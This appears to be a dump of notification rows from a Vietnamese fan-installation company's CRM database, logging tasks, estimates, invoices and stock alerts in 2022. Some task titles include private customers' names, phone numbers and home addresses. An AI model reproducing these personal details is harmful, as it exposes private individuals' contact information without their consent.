(914, 1, 1, '2022-07-20 09:20:24', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=47', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(916, 1, 1, '2022-07-20 09:20:29', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=51', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(918, 1, 1, '2022-07-20 16:33:42', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=54', 'a:1:{i:0;s:31:\"Lắp đặt quạt SAONA WHITE\";}'),
(921, 1, 1, '2022-07-23 09:36:19', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=55', 'a:1:{i:0;s:50:\"Thay thế lắp đặt bộ remote DC cho khách \";}'),
(925, 1, 1, '2022-07-23 09:36:19', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=55', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:50:\"Thay thế lắp đặt bộ remote DC cho khách \";}'),
(927, 1, 1, '2022-07-23 17:16:05', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=53', 'a:1:{i:0;s:95:\"Lắp đặt - Sửa chữa thu phí - Khách hàng cô Minh 1073 Nguyễn Trãi, P14, Quận 5\";}'),
(929, 1, 1, '2022-07-23 17:16:30', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=55', 'a:1:{i:0;s:50:\"Thay thế lắp đặt bộ remote DC cho khách \";}'),
(932, 1, 1, '2022-07-25 09:12:40', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=56', 'a:1:{i:0;s:53:\"Bảo hành sửa chữa quạt phát ra tiếng kêu\";}'),
(936, 1, 1, '2022-07-25 09:12:40', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=56', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:53:\"Bảo hành sửa chữa quạt phát ra tiếng kêu\";}'),
(937, 1, 1, '2022-07-25 10:05:05', 'not_customer_viewed_invoice', 0, 0, '', 1, 1, 'invoices/list_invoices/123', 'a:1:{i:0;s:10:\"INV-119-22\";}'),
(939, 1, 1, '2022-07-25 13:38:09', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=56', 'a:1:{i:0;s:53:\"Bảo hành sửa chữa quạt phát ra tiếng kêu\";}'),
(942, 1, 1, '2022-07-27 17:35:36', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=57', 'a:1:{i:0;s:40:\"Lắp đặt quạt Hamachi - Anh Tuấn\";}'),
(946, 1, 1, '2022-07-27 17:35:36', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=57', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:40:\"Lắp đặt quạt Hamachi - Anh Tuấn\";}'),
(948, 1, 1, '2022-07-28 08:12:30', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/26', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(959, 1, 1, '2022-07-28 23:57:50', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/27', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(965, 1, 1, '2022-07-29 09:20:23', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=57', 'a:1:{i:0;s:40:\"Lắp đặt quạt Hamachi - Anh Tuấn\";}'),
(978, 1, 1, '2022-07-30 13:56:49', 'not_contract_expiry_reminder', 0, 0, '', 1, 1, 'contracts/contract/55', 'a:1:{i:0;s:44:\"020522/HĐKT/HA-HAY - Hợp đồng mua bán\";}'),
(979, 0, 0, '2022-07-30 13:56:49', 'not_contract_expiry_reminder', 0, 0, '', 7, 1, 'contracts/contract/55', 'a:1:{i:0;s:44:\"020522/HĐKT/HA-HAY - Hợp đồng mua bán\";}'),
(982, 1, 1, '2022-07-30 13:58:44', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>', 1, 0, 'Ho Gia Phat', 1, NULL, NULL, 'a:1:{i:0;s:633:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>\";}'),
(985, 1, 1, '2022-07-30 13:58:54', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>', 1, 0, 'Ho Gia Phat', 1, NULL, NULL, 'a:1:{i:0;s:633:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>\";}'),
(988, 1, 1, '2022-07-30 14:33:21', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=14', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}'),
(996, 1, 1, '2022-07-31 15:52:30', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/124', 'a:1:{i:0;s:1:\"2\";}'),
(997, 1, 1, '2022-07-31 15:52:34', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/124', 'a:1:{i:0;s:1:\"2\";}'),
(998, 1, 1, '2022-08-02 15:34:37', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/92', 'a:1:{i:0;s:9:\"INV-87-22\";}'),
(1001, 1, 1, '2022-08-03 09:51:49', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/28', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1005, 0, 0, '2022-08-03 09:51:49', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/28', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1009, 1, 1, '2022-08-05 18:04:36', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=63', 'a:1:{i:0;s:26:\"Lắp đặt quạt Pearl \";}'),
(1013, 1, 1, '2022-08-05 18:04:36', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=63', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:26:\"Lắp đặt quạt Pearl \";}'),
(1015, 1, 1, '2022-08-06 14:58:16', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=63', 'a:1:{i:0;s:26:\"Lắp đặt quạt Pearl \";}'),
(1021, 1, 1, '2022-08-09 09:46:16', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=64', 'a:1:{i:0;s:36:\"A Nghĩa Lắp đặt 4 quạt Onix \";}'),
(1029, 1, 1, '2022-08-16 10:37:36', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=15', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}'),
(1035, 1, 1, '2022-08-17 09:25:10', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/29', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1039, 0, 0, '2022-08-17 09:25:10', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/29', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1058, 1, 1, '2022-08-19 11:08:49', 'not_estimate_customer_accepted', 0, 0, '', 1, 1, 'estimates/list_estimates/87', 'a:1:{i:0;s:11:\"QUOTE-87-22\";}'),
(1063, 1, 1, '2022-08-19 11:14:52', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=69', 'a:1:{i:0;s:45:\"Giao hàng lắp quạt Sino chị Trang Q.11\";}'),
(1068, 1, 1, '2022-08-19 11:14:52', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=69', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:45:\"Giao hàng lắp quạt Sino chị Trang Q.11\";}'),
(1071, 1, 1, '2022-08-19 11:15:26', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=69', 'a:2:{i:0;s:45:\"Giao hàng lắp quạt Sino chị Trang Q.11\";i:1;s:18:\"Đang tiến hành\";}'),
(1074, 1, 1, '2022-08-22 09:38:47', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/159', 'a:1:{i:0;s:10:\"INV-155-22\";}'),
(1080, 1, 1, '2022-08-22 09:50:22', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=70', 'a:1:{i:0;s:57:\"Giao hàng lắp đặt quạt Pearl - Anh Khải Vương\";}'),
(1085, 1, 1, '2022-08-22 09:50:22', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=70', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:57:\"Giao hàng lắp đặt quạt Pearl - Anh Khải Vương\";}'),
(1088, 1, 1, '2022-08-22 09:50:53', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=69', 'a:1:{i:0;s:45:\"Giao hàng lắp quạt Sino chị Trang Q.11\";}'),
(1092, 1, 1, '2022-08-22 09:51:02', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=70', 'a:2:{i:0;s:57:\"Giao hàng lắp đặt quạt Pearl - Anh Khải Vương\";i:1;s:18:\"Đang tiến hành\";}'),
(1096, 1, 1, '2022-08-22 09:51:26', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=67', 'a:1:{i:0;s:85:\"Lắp đặt Haiku L White 44 inch cho chị Mị Quận 7 (cạnh showroom quận 7)\";}'),
(1100, 1, 1, '2022-08-22 09:51:42', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=64', 'a:1:{i:0;s:36:\"A Nghĩa Lắp đặt 4 quạt Onix \";}'),
(1101, 1, 1, '2022-08-25 08:50:05', 'not_estimate_customer_accepted', 0, 0, '', 1, 1, 'estimates/list_estimates/88', 'a:1:{i:0;s:11:\"QUOTE-88-22\";}'),
(1102, 1, 1, '2022-08-25 09:41:58', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/168', 'a:1:{i:0;s:10:\"INV-162-22\";}'),
(1103, 1, 1, '2022-08-25 11:14:03', 'not_estimate_customer_accepted', 0, 0, '', 1, 1, 'estimates/list_estimates/89', 'a:1:{i:0;s:11:\"QUOTE-89-22\";}'),
(1105, 1, 1, '2022-08-25 16:58:40', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/30', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1109, 0, 0, '2022-08-25 16:58:40', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/30', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1124, 1, 1, '2022-08-29 12:08:32', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/15', 'a:1:{i:0;s:1:\"1\";}'),
(1125, 1, 1, '2022-08-29 12:08:35', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/15', 'a:1:{i:0;s:1:\"1\";}'),
(1126, 1, 1, '2022-08-29 12:09:53', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/14', 'a:1:{i:0;s:1:\"1\";}'),
(1127, 1, 1, '2022-08-29 12:09:56', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/14', 'a:1:{i:0;s:1:\"1\";}'),
(1128, 1, 1, '2022-08-29 12:57:21', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/17', 'a:1:{i:0;s:1:\"1\";}'),
(1129, 1, 1, '2022-08-29 12:57:23', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/17', 'a:1:{i:0;s:1:\"1\";}'),
(1130, 1, 1, '2022-08-29 13:02:29', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/18', 'a:1:{i:0;s:1:\"1\";}'),
(1131, 1, 1, '2022-08-29 13:02:31', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/18', 'a:1:{i:0;s:1:\"1\";}'),
(1132, 1, 1, '2022-08-29 13:25:07', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/19', 'a:1:{i:0;s:1:\"1\";}'),
(1133, 1, 1, '2022-08-29 13:25:09', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/19', 'a:1:{i:0;s:1:\"1\";}'),
(1134, 1, 1, '2022-08-29 14:03:03', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/162', 'a:1:{i:0;s:1:\"2\";}'),
(1135, 1, 1, '2022-08-29 14:03:06', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/162', 'a:1:{i:0;s:1:\"2\";}'),
(1136, 1, 1, '2022-08-29 14:07:52', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/163', 'a:1:{i:0;s:1:\"2\";}'),
(1137, 1, 1, '2022-08-29 14:07:55', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/163', 'a:1:{i:0;s:1:\"2\";}'),
(1151, 1, 1, '2022-08-31 16:23:49', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=73', 'a:1:{i:0;s:59:\"Kiểm tra sửa chữa quạt Aroma Chị Kha - 0773029511\";}'),
(1158, 1, 1, '2022-08-31 16:23:49', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=73', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:59:\"Kiểm tra sửa chữa quạt Aroma Chị Kha - 0773029511\";}'),
(1161, 1, 1, '2022-08-31 16:27:26', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=65', 'a:1:{i:0;s:83:\"Liên hệ lắp đặt hàng PEAR 60 Maple Wood chị Trang số đt : 0907486834 \";}'),
(1164, 1, 1, '2022-08-31 16:27:32', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=66', 'a:1:{i:0;s:45:\"Lắp đặt Pearl 60 - Maple Wood - Quận 7\";}'),
(1167, 1, 1, '2022-08-31 16:27:40', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=70', 'a:1:{i:0;s:57:\"Giao hàng lắp đặt quạt Pearl - Anh Khải Vương\";}'),
(1170, 1, 1, '2022-09-03 11:40:29', 'not_customer_viewed_proposal', 0, 0, '', 1, 1, 'proposals/list_proposals/10', 'a:1:{i:0;s:6:\"PRO-10\";}'),
(1172, 1, 1, '2022-09-04 00:09:39', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=16', 'a:1:{i:0;s:35:\"Form báo giá Web Quạt Cao Cấp\";}'),
(1176, 0, 0, '2022-09-04 00:09:39', 'not_lead_imported_from_form', 0, 0, '', 7, 1, '#leadid=16', 'a:1:{i:0;s:35:\"Form báo giá Web Quạt Cao Cấp\";}'),
(1186, 0, 0, '2022-09-04 09:52:01', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=74', 'a:1:{i:0;s:117:\"Liên hệ gởi hàng 0913579511 (Chú Thảo) - gởi hàng khách nhận xong, bố trí anh Ngũ đi lắp đặt\";}'),
(1194, 0, 0, '2022-09-04 09:52:01', 'not_task_assigned_someone', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=74', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:117:\"Liên hệ gởi hàng 0913579511 (Chú Thảo) - gởi hàng khách nhận xong, bố trí anh Ngũ đi lắp đặt\";}'),
(1198, 0, 0, '2022-09-04 09:52:01', 'not_task_added_himself_as_follower', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=74', 'a:1:{i:0;s:117:\"Liên hệ gởi hàng 0913579511 (Chú Thảo) - gởi hàng khách nhận xong, bố trí anh Ngũ đi lắp đặt\";}'),
(1209, 0, 0, '2022-09-04 09:53:41', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=75', 'a:1:{i:0;s:124:\"Sáng thứ 2 giao hàng Cha Ny - Người giao Mr.Trình (0947997662). Mỹ Anh xuất phiếu bán hàng thu tiền mặt.\";}'),
(1217, 0, 0, '2022-09-04 09:53:41', 'not_task_assigned_someone', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=75', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:124:\"Sáng thứ 2 giao hàng Cha Ny - Người giao Mr.Trình (0947997662). Mỹ Anh xuất phiếu bán hàng thu tiền mặt.\";}'),
(1221, 0, 0, '2022-09-04 09:53:41', 'not_task_added_himself_as_follower', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=75', 'a:1:{i:0;s:124:\"Sáng thứ 2 giao hàng Cha Ny - Người giao Mr.Trình (0947997662). Mỹ Anh xuất phiếu bán hàng thu tiền mặt.\";}'),
(1223, 1, 1, '2022-09-04 09:53:53', 'not_estimate_customer_accepted', 0, 0, '', 1, 1, 'estimates/list_estimates/90', 'a:1:{i:0;s:11:\"QUOTE-90-22\";}'),
(1226, 1, 1, '2022-09-05 09:43:39', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=75', 'a:2:{i:0;s:124:\"Sáng thứ 2 giao hàng Cha Ny - Người giao Mr.Trình (0947997662). Mỹ Anh xuất phiếu bán hàng thu tiền mặt.\";i:1;s:18:\"Đang tiến hành\";}'),
(1227, 0, 0, '2022-09-05 09:43:39', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 7, NULL, '#taskid=75', 'a:2:{i:0;s:124:\"Sáng thứ 2 giao hàng Cha Ny - Người giao Mr.Trình (0947997662). Mỹ Anh xuất phiếu bán hàng thu tiền mặt.\";i:1;s:18:\"Đang tiến hành\";}'),
(1231, 1, 1, '2022-09-05 09:43:52', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=71', 'a:2:{i:0;s:162:\"Hẹn lịch giao hàng lắp đặt quạt Hamachi LED - 5 cánh - Chị Hợp Nguyễn. Địa chỉ: 3/4 Phan Văn Hớn, Tân Thới Nhất, Quận 12, Tp HCM\";i:1;s:18:\"Đang tiến hành\";}'),
(1233, 1, 1, '2022-09-05 09:44:05', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=74', 'a:2:{i:0;s:117:\"Liên hệ gởi hàng 0913579511 (Chú Thảo) - gởi hàng khách nhận xong, bố trí anh Ngũ đi lắp đặt\";i:1;s:18:\"Đang tiến hành\";}'),
(1235, 0, 0, '2022-09-05 09:44:05', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 7, NULL, '#taskid=74', 'a:2:{i:0;s:117:\"Liên hệ gởi hàng 0913579511 (Chú Thảo) - gởi hàng khách nhận xong, bố trí anh Ngũ đi lắp đặt\";i:1;s:18:\"Đang tiến hành\";}'),
(1237, 1, 1, '2022-09-05 15:38:03', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/20', 'a:1:{i:0;s:1:\"1\";}'),
(1238, 1, 1, '2022-09-05 15:38:06', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/20', 'a:1:{i:0;s:1:\"1\";}'),
(1239, 1, 1, '2022-09-05 15:38:52', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/21', 'a:1:{i:0;s:1:\"1\";}'),
(1240, 1, 1, '2022-09-05 15:38:58', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/21', 'a:1:{i:0;s:1:\"1\";}'),
(1263, 1, 1, '2022-09-06 09:05:17', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=75', 'a:1:{i:0;s:124:\"Sáng thứ 2 giao hàng Cha Ny - Người giao Mr.Trình (0947997662). Mỹ Anh xuất phiếu bán hàng thu tiền mặt.\";}'),
(1264, 0, 0, '2022-09-06 09:05:18', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 7, NULL, '#taskid=75', 'a:1:{i:0;s:124:\"Sáng thứ 2 giao hàng Cha Ny - Người giao Mr.Trình (0947997662). Mỹ Anh xuất phiếu bán hàng thu tiền mặt.\";}'),
(1268, 1, 1, '2022-09-06 09:05:40', 'not_task_status_changed', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=73', 'a:2:{i:0;s:59:\"Kiểm tra sửa chữa quạt Aroma Chị Kha - 0773029511\";i:1;s:18:\"Đang tiến hành\";}'),
(1273, 1, 1, '2022-09-07 16:03:17', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=74', 'a:1:{i:0;s:117:\"Liên hệ gởi hàng 0913579511 (Chú Thảo) - gởi hàng khách nhận xong, bố trí anh Ngũ đi lắp đặt\";}'),
(1275, 0, 0, '2022-09-07 16:03:17', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 7, NULL, '#taskid=74', 'a:1:{i:0;s:117:\"Liên hệ gởi hàng 0913579511 (Chú Thảo) - gởi hàng khách nhận xong, bố trí anh Ngũ đi lắp đặt\";}'),
(1297, 1, 1, '2022-09-10 16:59:28', 'not_new_reminder_for', 0, 0, '', 1, 1, 'clients/client/1201', 'a:1:{i:0;s:67:\"Nhà Thờ Giáo Xứ Bạch Lâm - Đặt hàng mới 1 con 7m3...\";}'),
(1305, 1, 1, '2022-09-11 10:18:38', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=78', 'a:1:{i:0;s:98:\"Liên hệ thứ 3 ngày 13.9 lắp đặt PEARL 60 - địa chỉ: B17.10 Chung cư SSR - Sai Gon\";}'),
(1331, 1, 1, '2022-09-14 16:45:43', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/22', 'a:1:{i:0;s:1:\"1\";}'),
(1332, 1, 1, '2022-09-14 16:45:46', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/22', 'a:1:{i:0;s:1:\"1\";}'),
(1333, 1, 1, '2022-09-14 17:26:04', 'notify_send_request_approve_stock_export', 6, 0, 'Kế Toán Bán Hàng', 1, NULL, 'warehouse/edit_delivery/175', 'a:1:{i:0;s:1:\"2\";}'),
(1335, 1, 1, '2022-09-15 08:10:32', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/23', 'a:1:{i:0;s:1:\"1\";}'),
(1336, 1, 1, '2022-09-15 08:10:58', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/23', 'a:1:{i:0;s:1:\"1\";}'),
(1337, 1, 1, '2022-09-15 08:11:01', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/23', 'a:1:{i:0;s:1:\"1\";}'),
(1369, 1, 1, '2022-09-18 07:38:51', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/31', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1373, 0, 0, '2022-09-18 07:38:51', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/31', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1377, 1, 1, '2022-09-18 07:40:00', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/32', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1381, 0, 0, '2022-09-18 07:40:01', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/32', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1390, 1, 1, '2022-09-18 10:02:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=17', 'a:1:{i:0;s:35:\"Form báo giá Web Quạt Cao Cấp\";}'),
(1394, 0, 0, '2022-09-18 10:02:08', 'not_lead_imported_from_form', 0, 0, '', 7, 1, '#leadid=17', 'a:1:{i:0;s:35:\"Form báo giá Web Quạt Cao Cấp\";}'),
(1407, 0, 0, '2022-09-20 13:59:10', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=83', 'a:1:{i:0;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
(1415, 0, 0, '2022-09-20 13:59:10', 'not_task_assigned_someone', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=83', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
(1419, 0, 0, '2022-09-20 13:59:10', 'not_task_added_himself_as_follower', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=83', 'a:1:{i:0;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
